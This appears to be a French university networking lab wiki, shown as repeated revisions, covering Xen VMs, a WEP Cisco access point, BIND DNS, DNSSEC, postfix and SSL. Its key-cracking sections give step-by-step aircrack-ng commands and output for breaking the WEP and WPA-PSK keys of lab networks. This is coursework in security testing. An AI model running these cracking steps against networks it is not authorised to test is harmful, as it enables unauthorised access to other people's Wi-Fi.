[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===<br />
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. <br />
Nous utilisons pour commencer<br />
<pre>airmon-ng start wlan2 </pre><br />
Puis<br />
<pre>airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F</pre><br />
--encrypt permet de sélectionner le type d'encryption souhaité.<br />
<pre> CH 6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
30:5A:3A:15:F6:3F -34 100 738 1323 26 6 54e WPA2 CCMP PSK Poneyus <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
30:5A:3A:15:F6:3F 74:29:AF:F3:FD:91 -16 1e- 1 75 265 <br />
30:5A:3A:15:F6:3F 04:DB:56:3D:FD:A2 -40 0e- 0e 4709 1367 </pre><br />
<br />
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option <i>handshake</i><br />
<br />
et nous pouvons utiliser la commande<br />
<pre> aircrack-ng Poney.cap dico.txt</pre><br />
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt <br />
Et au bout d'une heure nous parvenons à retrouver la clé WPA .<br />
<br />
<pre> Aircrack-ng 1.2 beta3<br />
<br />
<br />
[01:01:16] 2857196 keys tested (792.44 k/s)<br />
<br />
<br />
KEY FOUND! [ 02857193 ]<br />
<br />
<br />
Master Key : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 <br />
D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 <br />
<br />
Transient Key : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 <br />
C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 <br />
21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 <br />
22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 <br />
<br />
EAPOL HMAC : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35653TP sysres IMA2a5 2016/2017 G42016-12-06T10:55:25Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés<br />
<pre>dmesg | grep tty</pre><br />
<br />
Pour configurer notre Cisco, on utilise <i>minicom -os</i> et pour cela nous devons être en root<br />
<br />
Une fois minicom lancé, on vient changer les paramètre de notre Cisco<br />
<br />
<pre>A - Serial Device : /dev/ttyUSB0<br />
B - Lockfile Location : /var/lock <br />
C - Callin Program :<br />
D - Callout Program :<br />
E - Bps/Par/Bits : 9600 8N1<br />
F - Hardware Flow Control : No<br />
G - Software Flow Control : No<br />
</pre><br />
<br />
On se connecte en admin sur le Cisco <br />
<Pre>enable<br />
config terminal<br />
</pre><br />
<br />
Configuration du SSID<br />
<pre>dot11 ssid MAMENE<br />
authentication open<br />
guest-mode<br />
</pre><br />
<br />
Configuraiton de l'interface Dot11Radio0<br />
<pre><br />
interface Dot11Radio0<br />
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key<br />
encryption mode wep mandatory<br />
</pre><br />
<br />
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés<br />
<pre>access-list 701 permit 5cb9.0180.a039 0000.0000.0000<br />
access-list 701 permit 3ca8.2a7a.05c5 0000.0000.0000<br />
access-list 701 permit 7429.aff3.fd91 0000.0000.0000<br />
access-list 701 permit 5cb9.0180.a139 0000.0000.0000</pre><br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===<br />
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. <br />
Nous utilisons pour commencer<br />
<pre>airmon-ng start wlan2 </pre><br />
Puis<br />
<pre>airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F</pre><br />
--encrypt permet de sélectionner le type d'encryption souhaité.<br />
<pre> CH 6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
30:5A:3A:15:F6:3F -34 100 738 1323 26 6 54e WPA2 CCMP PSK Poneyus <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
30:5A:3A:15:F6:3F 74:29:AF:F3:FD:91 -16 1e- 1 75 265 <br />
30:5A:3A:15:F6:3F 04:DB:56:3D:FD:A2 -40 0e- 0e 4709 1367 </pre><br />
<br />
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option <i>handshake</i><br />
<br />
et nous pouvons utiliser la commande<br />
<pre> aircrack-ng Poney.cap dico.txt</pre><br />
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt <br />
Et au bout d'une heure nous parvenons à retrouver la clé WPA .<br />
<br />
<pre> Aircrack-ng 1.2 beta3<br />
<br />
<br />
[01:01:16] 2857196 keys tested (792.44 k/s)<br />
<br />
<br />
KEY FOUND! [ 02857193 ]<br />
<br />
<br />
Master Key : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 <br />
D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 <br />
<br />
Transient Key : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 <br />
C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 <br />
21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 <br />
22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 <br />
<br />
EAPOL HMAC : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35652TP sysres IMA2a5 2016/2017 G42016-12-06T10:54:26Z<p>Jturut : /* Configuration du point d'accés Cisco */</p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés<br />
<pre>dmesg | grep tty</pre><br />
<br />
Pour configurer notre Cisco, on utilise <i>minicom -os</i> et pour cela nous devons être en root<br />
<br />
Une fois minicom lancé, on vient changer les paramètre de notre Cisco<br />
<br />
<pre>A - Serial Device : /dev/ttyUSB0<br />
B - Lockfile Location : /var/lock <br />
C - Callin Program :<br />
D - Callout Program :<br />
E - Bps/Par/Bits : 9600 8N1<br />
F - Hardware Flow Control : No<br />
G - Software Flow Control : No<br />
</pre><br />
<br />
On se connecte en admin sur le Cisco <br />
<Pre>enable<br />
config terminal<br />
</pre><br />
<br />
Configuration du SSID<br />
<pre>dot11 ssid MAMENE<br />
authentication open<br />
guest-mode<br />
</pre><br />
<br />
Configuraiton de l'interface Dot11Radio0<br />
</pre><br />
interface Dot11Radio0<br />
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key<br />
encryption mode wep mandatory<br />
</pre><br />
<br />
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés<br />
<pre>access-list 701 permit 5cb9.0180.a039 0000.0000.0000<br />
access-list 701 permit 3ca8.2a7a.05c5 0000.0000.0000<br />
access-list 701 permit 7429.aff3.fd91 0000.0000.0000<br />
access-list 701 permit 5cb9.0180.a139 0000.0000.0000</pre><br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
